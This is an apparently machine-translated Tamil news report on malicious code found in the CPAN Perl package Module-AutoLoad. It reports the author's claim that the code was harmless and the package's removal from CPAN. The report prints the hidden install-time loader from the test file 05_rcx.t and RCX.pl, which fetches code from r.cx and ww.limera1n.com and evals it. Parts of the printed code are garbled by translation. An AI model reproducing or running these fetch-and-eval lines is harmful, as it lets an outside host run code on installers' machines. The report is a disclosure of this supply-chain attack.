Module-AutoLoad Perl தொகுப்பில் தீங்கிழைக்கும் குறியீடு கண்டறியப்பட்டது

CPAN கோப்பகத்தின் மூலம் விநியோகிக்கப்படும் பெர்ல் தொகுப்பில் தொகுதி-ஆட்டோலோட், CPAN தொகுதிகளை தானாக ஏற்றும் வகையில் வடிவமைக்கப்பட்டுள்ளது, அடையாளம் காணப்பட்டது தீங்கிழைக்கும் குறியீடு. தீங்கிழைக்கும் செருகல் இருந்தது கண்டறியப்பட்டது சோதனைக் குறியீட்டில் 05_rcx.t, இது 2011 முதல் அனுப்பப்படுகிறது.
கேள்விக்குரிய குறியீட்டை ஏற்றுவது குறித்த கேள்விகள் எழுந்தது குறிப்பிடத்தக்கது Stackoverflow மீண்டும் 2016 இல்.

மாட்யூலை நிறுவும் போது தொடங்கப்பட்ட சோதனைத் தொகுப்பின் செயல்பாட்டின் போது மூன்றாம் தரப்பு சேவையகத்திலிருந்து (http://r.cx:1/) குறியீட்டைப் பதிவிறக்கி செயல்படுத்தும் முயற்சியில் தீங்கிழைக்கும் செயல்பாடு கொதித்தது. வெளிப்புறச் சேவையகத்திலிருந்து ஆரம்பத்தில் பதிவிறக்கம் செய்யப்பட்ட குறியீடு தீங்கிழைக்கவில்லை என்று கருதப்படுகிறது, ஆனால் இப்போது கோரிக்கையானது ww.limera1n.com டொமைனுக்கு திருப்பி விடப்படுகிறது, இது செயல்படுத்துவதற்கான குறியீட்டின் பகுதியை வழங்குகிறது.

ஒரு கோப்பில் பதிவிறக்கத்தை ஒழுங்கமைக்க 05_rcx.t பின்வரும் குறியீடு பயன்படுத்தப்படுகிறது:

எனது $prog = __FILE__;
$prog =~ s{[^/]+\.t}{../contrib/RCX.pl}x;
எனது $முயற்சி = `$^X $prog`;

குறிப்பிட்ட குறியீடு ஸ்கிரிப்டை செயல்படுத்துகிறது ../contrib/RCX.pl, அதன் உள்ளடக்கங்கள் வரிக்கு குறைக்கப்படுகின்றன:

lib do{eval<$b>&&botstrap("RCX")if$b=புதிய IO::Socket::INET 82.46.99.88.":1″};

இந்த ஸ்கிரிப்ட் ஏற்றுகிறது குழப்பமான சேவையைப் பயன்படுத்தி perlobfuscator.com வெளிப்புற ஹோஸ்ட் r.cx இலிருந்து குறியீடு (எழுத்து குறியீடுகள் 82.46.99.88 "R.cX" உரைக்கு ஒத்திருக்கிறது) மற்றும் அதை eval block இல் செயல்படுத்துகிறது.

$ perl -MIO::Socket -e'$b=புதிய IO::Socket::INET 82.46.99.88.":1″; <$b>;'
eval unpack u=>q{_<')I;G1[)&(];F5W($E/.CI3;V-K970Z.DE….}

திறக்கப்பட்ட பிறகு, பின்வருபவை இறுதியில் செயல்படுத்தப்படும்: மணிக்கு:

அச்சு{$b=புதிய IO::சாக்கெட்::INET"ww.limera1n.com:80″}"GET /iJailBreak
"; evalor return warn$@while$b;1

பிரச்சனைக்குரிய தொகுப்பு இப்போது களஞ்சியத்திலிருந்து அகற்றப்பட்டது. BREAK (Perl Authors Upload Server), மற்றும் தொகுதி ஆசிரியரின் கணக்கு தடுக்கப்பட்டது. இந்த வழக்கில், தொகுதி இன்னும் உள்ளது கிடைக்கிறது MetaCPAN காப்பகத்தில் மற்றும் cpanminus போன்ற சில பயன்பாடுகளைப் பயன்படுத்தி MetaCPAN இலிருந்து நேரடியாக நிறுவ முடியும். என்பது குறிப்பிடத்தக்கதுதொகுப்பு பரவலாக விநியோகிக்கப்படவில்லை என்று.

விவாதிக்க சுவாரஸ்யமானது இணைக்கப்பட்டுள்ளது மற்றும் அவரது தளமான “r.cx” ஹேக் செய்யப்பட்ட பிறகு தீங்கிழைக்கும் குறியீடு செருகப்பட்டது என்ற தகவலை மறுத்த தொகுதியின் ஆசிரியர், அவர் வேடிக்கையாக இருப்பதாக விளக்கினார், மேலும் perlobfuscator.com ஐப் பயன்படுத்தி எதையாவது மறைக்கவில்லை, ஆனால் அளவைக் குறைக்கிறார். குறியீட்டின் மற்றும் கிளிப்போர்டு வழியாக நகலெடுப்பதை எளிதாக்குகிறது. "போட்ஸ்ட்ராப்" என்ற செயல்பாட்டுப் பெயரின் தேர்வு, இந்த வார்த்தை "போட் போல் தெரிகிறது மற்றும் பூட்ஸ்ட்ராப்பை விடக் குறைவாக உள்ளது" என்பதன் மூலம் விளக்கப்படுகிறது. அடையாளம் காணப்பட்ட கையாளுதல்கள் தீங்கிழைக்கும் செயல்களைச் செய்யாது, ஆனால் TCP வழியாக குறியீட்டை ஏற்றுதல் மற்றும் செயல்படுத்துவதை மட்டுமே நிரூபிக்கும் என்றும் தொகுதியின் ஆசிரியர் உறுதியளித்தார்.

ஆதாரம்: opennet.ru

கருத்தைச் சேர்